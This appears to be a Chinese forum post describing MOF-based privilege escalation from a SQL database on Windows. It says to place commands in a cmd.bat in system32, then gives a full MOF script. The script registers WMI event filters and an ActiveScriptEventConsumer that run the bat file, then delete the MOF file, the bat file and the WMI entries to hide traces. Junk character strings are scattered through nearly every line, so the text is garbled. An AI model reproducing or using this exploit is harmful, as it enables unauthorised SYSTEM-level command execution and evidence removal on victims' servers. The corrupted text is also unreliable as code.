这个sql提权MOF需要运行 system下的文件,不能定义路径。! @" B7 x1 ~9 H1 r' e* H+ O/ M
需要将要运行的命令写入到bat上传到system32目录,然后执行。
. ]+ ~2 Z7 X. @# s! Y" \1 A
, o, }" j5 x( h1 k4 h# p) ~* x这个sql提权MOF需要运行 system下的文件,不能定义路径。
: e! p- J, N L5 v5 p需要将要运行的命令写入到bat上传到system32目录,然后执行。
! a! Z0 ~5 y0 T( Q* v4 [0 Y$ A1 q' _" k* E
#pragma( C+ j' ~2 d- D5 O' M7 o' r6 H
namespace("\\\\.\\root\\cimv2")
$ t5 X4 P5 q5 ^* C class
) R g. L) m; \ MyClass547: ?+ j5 s$ c3 _# O% ^
{ [key]8 t# v9 M2 p% l& g/ a; r' o O
string. W# h9 @/ P7 K! A! H
Name;! p: T: u% {0 ]: l9 H8 E* C5 H6 F% o! P
};
" b$ m" d8 @3 X1 `' o5 C+ }. ` class1 |6 ^& { @& s6 W2 B ]! [, Q% z$ M8 i
ActiveScriptEventConsumer5 D- f7 P5 ]( v0 z
: __EventConsumer { [key]
/ X1 t5 O" t+ i } string% g- U3 z9 E7 v4 _2 ~3 l5 X
Name; [not_null]7 i2 Y9 `1 w. P4 |
string) g; K* ]4 l4 ?7 n% [5 F, n' ?! |
ScriptingEngine; string8 M* c. n1 C2 A$ [2 Z& T2 h1 V
ScriptFileName; [template]
/ k; I. A, l# n6 v3 z string
+ l0 Y1 b4 K3 q7 h! o* k ScriptText; uint32 KillTimeout;
0 u, }, b! T: r" Y }; instance of __Win32Provider as $P {
0 P+ ?# L$ f, t- H. V3 f- r& k3 Q Name$ h7 a. `$ e5 A
=5 J% M; d" P$ A/ A1 u3 a+ }
"ActiveScriptEventConsumer"; CLSID =
/ G. W7 z; [/ `% \5 w "{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";7 e4 w% m Z- M$ Z1 i( H- V
PerUserInitialization% A9 y2 H. f7 }4 Y2 v5 J
= TRUE;
8 e. X, _+ B2 R8 J+ L! q" b' Q }; instance of __EventConsumerProviderRegistration { Provider
: n) L. [4 }3 ~ [, ` = $P; ConsumerClassNames( O- L$ r' E: u* A* `' N5 H
=
0 V5 f0 }1 h) t; A; a {"ActiveScriptEventConsumer"};
{6 U2 h; k- I3 E, Y9 o. L };
/ f: ]& `6 T' `% ]+ n Instance of ActiveScriptEventConsumer$ q1 y& p9 ]& R! |1 p! `% w: ?6 p
as $cons { Name3 u1 D R4 i* `. B) C5 _7 R2 t, \
=
# P/ A3 O: F, E, r( T* k5 `9 J "ASEC"; ScriptingEngine( _" D2 a/ \ [. I
=
4 e; G3 M" J4 g* N8 @$ M "JScript"; ScriptText
% C1 K6 z2 Z- D1 v5 e =! j4 n3 M) O3 I; Y6 \
"\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"cmd.bat\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass547\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};"; };
- F7 V. p* c+ y* P+ w+ \ Instance of ActiveScriptEventConsumer
( M7 E4 i) z9 F* } as $cons2 { Name1 R" P: Y9 p2 H7 m# F6 C' z
=7 F4 `) l- j2 k; E1 M
"qndASEC"; ScriptingEngine+ W* N4 \# c0 c' t% ^
=+ M x/ J' p3 H5 y1 Z' p
"JScript"; ScriptText, Y \& @( L, W
=
9 [1 r6 u8 E) t) ]7 i "\nvar objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\ntry {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\hBsBa.mof\");\nf1.Delete(true);} catch(err) {};\ntry {\nvar f2 = objfs.GetFile(\"cmd.bat\");\nf2.Delete(true);\nvar s = GetObject(\"winmgmts:root\\\\cimv2\");s.Delete(\"__EventFilter.Name='qndfilt'\");s.Delete(\"ActiveScriptEventConsumer.Name='qndASEC'\");\n} catch(err) {};";
/ |% d8 ~0 `$ v% J O/ ~; Q }; instance of __EventFilter as $Filt { Name
* V% U# x8 C/ @6 d* I! W$ T =( J( V2 z: y5 S5 F
"instfilt"; Query
& z9 p$ s# y: c =
_/ w* e. \1 S; ~ T) x "SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass547\""; QueryLanguage$ O6 {7 H; N, \, P. q$ Z- f7 J
=/ t4 F0 U( g5 z* R6 O+ c
"WQL"; }; instance of __EventFilter as $Filt2 { Name& [' h& O7 B& w$ M) y
=/ _* S: x* {5 B! i' ^3 F
"qndfilt"; Query0 ]! r; c7 B: K& `: |; b
=
" r$ ~% D7 j- h& W' ?! h+ h+ c "SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name = \"cmd.bat\""; QueryLanguage2 | w2 e0 v( `8 s
=8 u }# M3 l& u
"WQL"; }; instance of __FilterToConsumerBinding as $bind { Consumer
( X4 c: F/ a7 U. a = $cons; Filter
! F8 G ? i: s! |9 w7 Z5 C = $Filt;8 J1 M5 }' a1 U, l, J. L
}; instance of __FilterToConsumerBinding as $bind2 { Consumer1 b( _ s" ?3 G0 ^/ _- C. |( }
= $cons2; Filter
$ j& l, ^6 i0 A$ o$ }1 g = $Filt2;+ z- ]+ O) R7 B$ h W# `: q
}; instance of MyClass5479 [. x5 Y' v6 M
as $MyClass { Name" N! W! L+ ~' e; J
=
. l" @! c* W7 w' G "ClassConsumer";
, u* n& S0 P1 w f }; |